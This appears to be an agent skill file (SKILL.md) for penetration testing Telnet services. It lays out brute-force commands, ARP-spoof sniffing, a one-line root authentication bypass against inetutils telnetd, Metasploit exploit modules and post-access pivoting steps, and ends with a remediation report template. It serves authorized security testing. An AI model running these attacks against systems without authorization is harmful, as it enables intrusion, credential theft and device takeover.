pentesting-telnet
$
npx mdskill add xalgord/xalgorix/pentesting-telnet- Default port `23/tcp` (some appliances expose alternates). Telnet is an **unencrypted** remote-access protocol. - When `nmap`/banner shows `telnet`, a `telnetd` daemon, or a login prompt over port 23. - Very common on IoT, routers, switches, VoIP, and legacy UNIX — a prime target for default-credential and cleartext-sniffing attacks.
SKILL.md
.github/skills/pentesting-telnetView on GitHub ↗
---
name: pentesting-telnet
description: Testing Telnet services (default port 23) for cleartext credential capture, default/weak and hard-coded credentials, NTLM info disclosure, option negotiation issues, and code-execution/DoS CVEs (inetutils telnetd NEW_ENVIRON option injection CVE-2026-24061, D-Link CVE-2024-45698, NETGEAR CVE-2023-40478, inetutils DoS CVE-2022-39028) during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- telnet
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting Telnet (port 23)
## When to Use
- Default port `23/tcp` (some appliances expose alternates). Telnet is an **unencrypted** remote-access protocol.
- When `nmap`/banner shows `telnet`, a `telnetd` daemon, or a login prompt over port 23.
- Very common on IoT, routers, switches, VoIP, and legacy UNIX — a prime target for default-credential and cleartext-sniffing attacks.
## Quick Enumeration
```bash
# Banner grab
nc -vn <IP> 23
# Safe scripted enumeration
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
# Option / feature probes
nmap -p 23 --script telnet-encryption <IP> # ENCRYPT option support
nmap -p 23 --script telnet-ntlm-info <IP> # Microsoft Telnet NTLM (NetBIOS/DNS/OS build)
# Consoleless metasploit enumeration
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS <IP>; set RPORT 23; run; exit'
```
## Critical: Checks Most Often Missed
- **Cleartext credentials on the wire** — everything (including the password) is plaintext. On a switched LAN, MitM then sniff.
- How to CONFIRM:
```bash
sudo tcpdump -i eth0 -A 'tcp port 23'
# Wireshark display filter: tcp.port == 23 && (telnet.data || telnet.option)
```
- **Default / hard-coded credentials** — IoT botnets (Mirai) thrive here. Try vendor defaults and small dictionaries.
- How to CONFIRM: `hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>` returns a valid pair.
- **NTLM info disclosure** — Microsoft Telnet leaks NetBIOS/DNS/OS build via `AUTH NTLM`.
- How to CONFIRM: `nmap -p23 --script telnet-ntlm-info <IP>`.
- **inetutils telnetd NEW_ENVIRON option injection (CVE-2026-24061)** — `%U` is expanded from the client-supplied `USER` env var into the `login` argv; a value starting with `-` becomes a flag (`-f root`) → auth bypass to root (inetutils 1.9.3–2.7).
- How to CONFIRM (lab):
```bash
USER='-f root' telnet -a <IP> # yields /usr/bin/login -h <host> "-f root" -> root shell
telnetd --version ; dpkg -l | grep inetutils ; netstat -tlnp | grep :23
```
- **Device CVEs to triage**: D-Link DIR-X4860 hard-coded creds + command injection (CVE-2024-45698), NETGEAR RAX30 `passwd` stack overflow (CVE-2023-40478), inetutils telnetd NULL-deref DoS via `0xff 0xf7`/`0xff 0xf8` (CVE-2022-39028).
## Workflow
### Step 1: Enumerate (version, options, NTLM)
```bash
nc -vn <IP> 23
nmap -n -sV -Pn --script "*telnet*" -p 23 <IP>
nmap -p23 --script telnet-encryption,telnet-ntlm-info <IP>
```
### Step 2: Authenticate (default creds, brute force)
```bash
# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
# Ncrack (drops to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
# NSE brute auditor
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>
```
### Step 3: Exploit / Extract (sniff, inject, CVE)
```bash
# Capture creds via MitM + sniff on a switched network
# 1. ARP spoof: arpspoof -i eth0 -t <victim> <gateway> (or ettercap)
# 2. Sniff: sudo tcpdump -i eth0 -A 'tcp port 23'
# inetutils option-injection auth bypass (lab/authorized)
USER='-f root' telnet -a <IP>
# Metasploit modules
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS <IP>; run; exit' # Solaris 9/10 RCE
msfconsole -q -x 'use exploit/linux/mips/netgear_telnetenable; set RHOSTS <IP>; run; exit' # enable telnet on NETGEAR
```
### Step 4: Post-access / pivot
- TTYs are usually dumb — upgrade: `python3 -c 'import pty;pty.spawn("/bin/bash")'`.
- Harvest device configs/credentials and reuse against SSH/web/SNMP management interfaces.
- Watch for outbound port-23 reverse shells; compromised devices often beacon over Telnet to evade strict-HTTP egress filters.
## Key Concepts
| Concept | Description |
|---------|-------------|
| **Cleartext transport** | All data and credentials traverse the network unencrypted — passively sniffable. |
| **IAC option negotiation** | `IAC + DO/DONT/WILL/WONT` agree on options (echo, charset, ENCRYPT, NEW_ENVIRON). |
| **NEW_ENVIRON injection** | Client-pushed env vars (e.g., `USER`) reaching the `login` argv enable option injection (CVE-2026-24061). |
| **NTLM disclosure** | Microsoft Telnet `AUTH NTLM` leaks host/domain/OS metadata. |
| **Default-cred exposure** | IoT/embedded devices ship weak/hard-coded logins; mass-scanned by botnets. |
| **ENCRYPT option bugs** | Historic mishandling (e.g., Solaris) led to overflow/RCE; NSE only checks support. |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap NSE** | `telnet-encryption`, `telnet-ntlm-info`, `telnet-brute`, `*telnet*` safe scripts. |
| **nc / telnet** | Banner grab, manual option negotiation, exploitation of option injection. |
| **hydra / ncrack / medusa** | Credential brute force against the login. |
| **tcpdump / Wireshark / ettercap** | Cleartext credential capture and MitM. |
| **Metasploit** | `telnet_version`, `telnet_encrypt_overflow`, `brocade_enable_login`, `netgear_telnetenable`. |
| **arpspoof / ettercap** | ARP spoofing to position for sniffing on switched networks. |
## Common Scenarios
### Scenario 1: Default creds on an IoT device
A camera exposes telnet on 23. `hydra -L users.txt -P mirai-defaults.txt telnet://<IP>` finds `root:vizxv`, granting a busybox shell and device takeover.
### Scenario 2: Cleartext credential capture
On a switched LAN, ARP spoofing redirects an admin's telnet session through the tester's host. `tcpdump -A 'tcp port 23'` reveals the typed username and password in plaintext, reused on adjacent SSH services.
### Scenario 3: inetutils telnetd auth bypass
A Linux host runs vulnerable inetutils telnetd. `USER='-f root' telnet -a <IP>` injects `-f root` into the login argv, spawning a pre-authenticated root shell (CVE-2026-24061).
## Output Format
```
## Telnet Finding
**Service**: Telnet
**Port**: 23/tcp (Linux inetutils telnetd 2.4)
**Severity**: Critical
**Finding**: Cleartext protocol + authentication bypass via NEW_ENVIRON option injection
**Evidence**:
- tcpdump 'tcp port 23' captured "admin / S3cret!" in plaintext
- USER='-f root' telnet -a <IP> -> uid=0(root) shell (CVE-2026-24061)
**Impact**: Credentials are exposed to any network observer, and an unauthenticated attacker can obtain a root shell.
**Recommendation**:
1. Disable Telnet entirely and use SSH instead.
2. If unavoidable, restrict to a management VLAN with ACLs/TCP wrappers and patch telnetd (inetutils >= 2.7-2).
3. Rotate all credentials exposed over cleartext Telnet.
```